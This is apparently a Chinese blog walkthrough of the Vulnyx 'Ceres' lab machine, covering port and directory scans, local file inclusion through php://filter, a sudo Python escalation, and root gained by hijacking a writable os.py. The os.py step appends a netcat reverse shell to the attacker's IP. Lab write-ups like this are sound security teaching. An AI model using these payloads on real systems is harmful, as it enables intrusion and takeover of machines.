Pepster'Blog
Vulnyx-Ceres-Walkthrough
城南花已开 Lv6
  2025-03-01 21:05:39   2025-04-18 23:34:08    2.2k 字  12 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.220  08:00:27:3b:f1:50       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.035 seconds (125.80 hosts/sec). 4 responded
export ip=192.168.60.220
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.220:22
Open 192.168.60.220:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 21:06 CST
Initiating ARP Ping Scan at 21:06
Scanning 192.168.60.220 [1 port]
Completed ARP Ping Scan at 21:06, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:06
Completed Parallel DNS resolution of 1 host. at 21:06, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:06
Scanning 192.168.60.220 [2 ports]
Discovered open port 80/tcp on 192.168.60.220
Discovered open port 22/tcp on 192.168.60.220
Completed SYN Stealth Scan at 21:06, 0.06s elapsed (2 total ports)
Nmap scan report for 192.168.60.220
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-03-01 21:06:42 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:3B:F1:50 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.220
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 80]
/file.php             (Status: 200) [Size: 0]
/secret.php           (Status: 200) [Size: 54]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

index.html中只有个图片好像是某个星球吧,具体我也不知道

image

怀疑有图片隐写,wget下来尝试一下,图片还是写在css中的,无果

利用curl了一下/secret.php,发现显示命令id的回显

1
2
❯ curl $ip/secret.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

LFI

猜测file.php中存在LFI漏洞,但我测了半天参数,好像并没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ wfuzz -c -u "http://$ip/file.php?FUZZ=../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.220/file.php?FUZZ=../../../../etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 101.8388
Processed Requests: 207643
Filtered Requests: 207643
Requests/sec.: 2038.936

无论输入什么参数都返回零

尝试利用php过滤器来读文件secret.php

不过我不知道为啥不用写.php

得到参数file

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ wfuzz -c -u "http://$ip/file.php?FUZZ=php://filter/convert.base64-encode/resource=secret" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.220/file.php?FUZZ=php://filter/convert.base64-encode/resource=secret
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000741:   200        0 L      1 W        88 Ch       "file"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 13.44606
Processed Requests: 1492
Filtered Requests: 1491
Requests/sec.: 110.9618

curl一下解码base64,得到源码中含有注释

My_H1dd3n_S3cr3t

id命令是代码中写死了

1
2
3
4
5
6
7
8
❯ curl http://$ip/file.php\?file\=php://filter/convert.base64-encode/resource\=secret|base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    88  100    88    0     0  43010      0 --:--:-- --:--:-- --:--:-- 44000
<?php
    system("id"); //                  /My_H1dd3n_S3cr3t
?>

猜测这个注释是某个目录

尝试再次扫描一下,又得到一个file.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ gobuster dir -u "http://$ip/My_H1dd3n_S3cr3t" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.220/My_H1dd3n_S3cr3t
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/file.php             (Status: 200) [Size: 0]
Progress: 246441 / 1038220 (23.74%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 248154 / 1038220 (23.90%)
===============================================================
Finished
===============================================================

再次模糊测试一下

还是参数file可以文件读取,这回/etc/passwd有回显了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ wfuzz -c -u "http://192.168.60.220/My_H1dd3n_S3cr3t/file.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.220/My_H1dd3n_S3cr3t/file.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000741:   200        26 L     38 W       1404 Ch     "file"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 37.39385
Processed Requests: 25810
Filtered Requests: 25809
Requests/sec.: 690.2203

得到用户giuseppe

1
2
3
4
5
6
7
❯ curl http://192.168.60.220/My_H1dd3n_S3cr3t/file.php\?file\=/etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--   100  1404  100  1404    0     0   693k      0 --:--:-- --:--:-- --:--:-- 1371k
root:x:0:0:root:/root:/bin/bash
giuseppe:x:1000:1000:giuseppe,,,:/home/giuseppe:/bin/bash

利用php过滤器读一下源码/My_H1dd3n_S3cr3t/file.php

file.php这就解释了上面为什么不用写.php在代码中已经写了

1
2
3
4
5
6
7
8
9
10
echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydmaWxlJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg=="|base64 -d
<?php
    $filename = $_GET['file'];
    include($filename);
?>
echo "PD9waHAKICAgIGluY2x1ZGUoJF9HRVRbImZpbGUiXS4iLnBocCIpOwo/Pgo="|base64 -d
<?php
    include($_GET["file"].".php");
?>

利用php过滤器进行rce

HackMyVM-Medusa-Walkthrough | Pepster’Blog

或者利用apache的日志access.log
参考https://book.hacktricks.wiki/en/pentesting-web/file-inclusion/index.html#via-apachenginx-log-file

用户提权

尝试反弹一下shell,监听一下端口

/opt下有个脚本

而且www-data用户还有sudo权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ pwncat-cs -lp 4444
[21:37:54] Welcome to pwncat 🐈!                            __main__.py:164
[21:41:53] received connection from 192.168.60.220:37774         bind.py:84
[21:41:54] 192.168.60.220:37774: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) www-data@ceres:/var/www/html/My_H1dd3n_S3cr3t$ ls -al
total 12
drwxr-xr-x 2 www-data www-data 4096 May  3  2023 .
drwxr-xr-x 3 www-data www-data 4096 May  3  2023 ..
-rw-r--r-- 1 www-data www-data   64 Mar  6  2021 file.php
(remote) www-data@ceres:/opt$ cat important.py
#!/usr/bin/python

import os

os.system('/usr/bin/id > /opt/id')
os.system('/usr/bin/sleep 15')
os.system('/usr/bin/rm /opt/id')
os.system('/usr/bin/sleep 15')
(remote) www-data@ceres:/opt$ sudo -l
Matching Defaults entries for www-data on ceres:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on ceres:
    (giuseppe) NOPASSWD: /usr/bin/python

利用python正常提权

1
2
3
4
5
(remote) www-data@ceres:/opt$ sudo -u giuseppe /usr/bin/python -c  'import pty;pty.spawn("/bin/bash")'
giuseppe@ceres:/opt$ cd ~
giuseppe@ceres:~$ cat user.txt
16461eb65ce11cbabbe32cf1cf35a4f5

传个pspy上去,监测一下进程

果然root会定期执行/opt/important.py

1
2
3
4
5
6
7
8
9
2025/03/01 14:47:01 CMD: UID=0     PID=1      | /sbin/init
2025/03/01 14:47:01 CMD: UID=0     PID=1786   | /usr/sbin/CRON -f
2025/03/01 14:47:01 CMD: UID=0     PID=1787   | /usr/sbin/CRON -f
2025/03/01 14:47:01 CMD: UID=0     PID=1788   | /bin/sh -c /opt/important.py
2025/03/01 14:47:01 CMD: UID=0     PID=1789   | /usr/bin/python /opt/important.py
2025/03/01 14:47:01 CMD: UID=0     PID=1790   | sh -c /usr/bin/id > /opt/id
2025/03/01 14:47:01 CMD: UID=0     PID=1792   | /usr/bin/sleep 15
2025/03/01 14:47:01 CMD: UID=0     PID=1791   | sh -c /usr/bin/sleep 15

Root提权

Python库劫持

我查找一下可写的文件

发现python中的os.py库是可以写的

1
2
3
4
5
6
7
8
giuseppe@ceres:/opt$ find / -writable -type f 2>/dev/null |grep -Pv "proc|sys"
/home/giuseppe/.profile
/home/giuseppe/.bashrc
/home/giuseppe/.bash_logout
/tmp/pspy64
/usr/lib/python2.7/os.py
/var/log/apache2/access.log

在文件末尾追加一下反弹shell代码

因为我们修改的os库,所以可以利用subprocess进行执行系统命令

或者直接参考Linux 权限提升 - HackTricks

1
giuseppe@ceres:/tmp$ echo "import subprocess;subprocess.call(['nc', '-e','/bin/bash','192.168.60.100','4444'], shell=False)">> /usr/lib/python2.7/os.py

监听端口,成功拿到root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ pwncat-cs -lp 4444
[22:46:15] Welcome to pwncat 🐈!                           __main__.py:164
[22:46:59] received connection from 192.168.60.220:37782        bind.py:84
[22:47:00] 0.0.0.0:4444: normalizing shell path             manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to    manager.py:957
           /usr/bin/bash
           192.168.60.220:37782: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) root@ceres:/root# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@ceres:/root# cat /root/root.txt
fb41c2cb45f8b4ee387fabac849d6449
(remote) root@ceres:/root#
  1. 信息收集
    1. 服务探测
    2. LFI
  2. 用户提权
  3. Root提权
    1. Python库劫持
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. LFI
  2. 用户提权
  3. Root提权
    1. Python库劫持